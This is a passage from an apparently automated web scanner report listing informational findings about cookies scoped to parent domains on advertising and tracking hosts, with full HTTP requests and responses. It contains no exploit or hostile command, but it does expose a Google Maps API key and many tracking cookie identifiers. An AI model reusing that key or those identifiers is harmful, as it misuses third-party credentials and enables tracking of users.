PREF=ID=ee9b3b8ecc4b4ec2:TM=1311109135:LM=1311109135:S=cayOe7PfiMmmwdYV; expires=Thu, 18-Jul-2013 20:58:55 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAHjOizKxN3j2yyJbuGOLs0hSEzOL_OikNPvVpm0ynWQuaOLPCJRTyZcUWYx2cYT4gRtYy4kNqIbxYmw HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=ee9b3b8ecc4b4ec2:TM=1311109135:LM=1311109135:S=cayOe7PfiMmmwdYV; expires=Thu, 18-Jul-2013 20:58:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Tue, 19 Jul 2011 20:58:55 GMT
Server: mfe
Cache-Control: private
Content-Length: 10101
X-XSS-Protection: 1; mode=block
Expires: Tue, 19 Jul 2011 20:58:55 GMT

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

13.78. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lyc=CwAAAASniB1OACAAAZVbIASgAAYkTQAAyhgHYBcB3VigFCAABANIAAC14AoXBqpRAABWlARgLwG9RCAooAAGeVcAAGB3JWAXAXBfoBQgAAZBUwAAwPX1IGUDAAC0RyAEoAAASiAHARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcAUOACvwalTAAA7+znYBcBaFbgATEBoUXgAQvgBY8BAAA=; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT
pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=24432;evt=17182;cat1=21312;cat2=21313;rand=43948 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BxIAAACYkAROIAYGAAFJAABAYSAHIAtAAACV4AIXAIbgAhcDP8zXTUAfQC8B9FkgB0AMIAAAAuACFwDN4AIXAcPL4AEvAWla4AEvALHgAhcByGDgARcAoOACFwG0ViBXIFtAAAA44AIXAetc4AEXADHgAhcB+1/gAUcAJOACFwDY4AJfAAPgAhcANuACLwHcyuABpwDT4AK/ANngAhcAPuACvwDT4AIXAIwhQcCnANDgAhcBR1PgAY8AzOACFwGiUuABFwDJ4AIXAOPgAo8BbLHgAY8EzU8AAApBBAIAAAA=; lyc=CgAAAATKGAdOACAAAd1YIASgAAQDSAAAteAKFwaqUQAAVpQEYC8BvUSgLCAABnlXAAB47gNgFwFwXyAQoAAHQVMAAMD19U1ADgG0R0AFgAAASiAGARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcBUFvgARkGpUwAAO/s52AXAWhW4AEXAaFF4AELAJXgAi8DJE0AAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:02 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CwAAAASniB1OACAAAZVbIASgAAYkTQAAyhgHYBcB3VigFCAABANIAAC14AoXBqpRAABWlARgLwG9RCAooAAGeVcAAGB3JWAXAXBfoBQgAAZBUwAAwPX1IGUDAAC0RyAEoAAASiAHARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcAUOACvwalTAAA7+znYBcBaFbgATEBoUXgAQvgBY8BAAA=; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT

GIF89a.............!.......,...........D..;

13.79. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tick=1311108255065; Domain=outbrain.com; Path=/
_lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
_lvd2="iYJQahqaNoybZPBlL1y+oQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Tue, 26-Jul-2011 09:32:15 GMT; Path=/
_rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
recs-ad82f50455df441759d1d8530ecdbaac="QHChs7CRExG12Ow/i/bhLoTOUAVA7ck9pHYzRgDMxFx+vgba/12gWJv6sgRAr7jYeFcfE+OdrabgVFZDw9TGi+6jLuHWn5mlULTTird7SsSJakbqdZgl2fl7pZFJ8vmZeVMaUm5Ix9l5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 20:49:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html&srcUrl=http%3A%2F%2Fwww.boston.com%2Fbusiness%2Fticker%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=40506&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&apv=false&rand=0.39396007347768847&sig=s_ppv HTTP/1.1
Host: odb.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311108255065; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: _lvd2="iYJQahqaNoybZPBlL1y+oQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Tue, 26-Jul-2011 09:32:15 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: recs-ad82f50455df441759d1d8530ecdbaac="QHChs7CRExG12Ow/i/bhLoTOUAVA7ck9pHYzRgDMxFx+vgba/12gWJv6sgRAr7jYeFcfE+OdrabgVFZDw9TGi+6jLuHWn5mlULTTird7SsSJakbqdZgl2fl7pZFJ8vmZeVMaUm5Ix9l5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 20:49:15 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:14 GMT
Content-Length: 9127

outbrain_rater.returnedOdbData({'response':{'exec_time':16,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'218543332','req_id':'1f90121845ccabe94998d7832ea7afec'},'score':{'preferred
...[SNIP]...

13.80. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a; Domain=.brilig.com; Expires=Thu, 11-Jul-2041 20:49:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: bbid=AF3T0ZtvfNiS8n5ute4V6MxOq7wh9gs1wNTf-pOwShyGtPc05ECIyf18y-IKKgFQ_phFyOae3m-BfPHqrP1WJ_dHlkRfc-7LJvpeFml7opJiEzAyW-1PPXs; BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 20:49:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 20:49:02 GMT
Set-Cookie: BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a; Domain=.brilig.com; Expires=Thu, 11-Jul-2041 20:49:02 GMT
Location: http://a.collective-media.net/datapair?net=vt
Content-Length: 0
X-Brilig-D: D=3656
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain

13.81. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/C07583/b3/0/3/1008211/494237794.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4zOheXIMH/C1v6FY5Pio22rQpqLOQoPYd+GAD9VybyI+F4QNbwPPyvr8UGBZ6Vjnvedz63aa7pnxc5JCqQR+k2XOvNLfrCxC41VqqLiodbQjQZqBJei4H2TQvkinqMG8kBtM1kg38//fE0fhbl4QK/GL4tvC3vzfaUVMGHcMdGNMZDiIp4XW2dfAgHAn0AB43JJkmIRNHpWmlV7EGVMQOAUZTY3DQWOclImVvDGQzJdNDr9N803R6yNbqW2d3xDmBVK5G8Y5QNpT84suIacDxFRWhiYiXxb6RcnJUO2n/LXfOLncVWRHBhWNCNIPk4gU4G3WJWfrTzaR0w/9p8kAZYw/qSf0HduMZyRYt6LR1bdMVxUQzgDYC/ga7q1aqSAbYdYG+o469SYWL9OMk8vxEHcb637CHu1UrWG39L+tr8mGcL7imea6BA9t/9jx6c5vIunljkjwSkw7oZE6c9cxHJE3u6ZSqe5K7ULm42XLRCJg12GrcbV5R4Evkk8Eh3y8428t+dZDhkKZQfs6pQGSlwp/5wH0C/76A2MS1Et9/oXJ3c2aaIwXyMJ257RRIFcfpL1U2s4woUYUay7tTLmnBowyx/SmoO5VF7gHr3EqVITLWizD+JwSwrv3jkfgWAvJMCSFEmiAl6KPZbHNG37jgXCVku1jpFl4dQ8nZk9rn2v9l3cmZ2Ze33QfideBivuvdgt2Q0Ajm7NbHTt27ZRnHqp2Ze2QrczWEeEx7EO+FRH1TYLkFj7bxPfWgnX9H/Az/z5Qgw==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
rtc_dIjc=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; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /C07583/b3/0/3/1008211/494237794.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.gamestop.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=C07583 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3b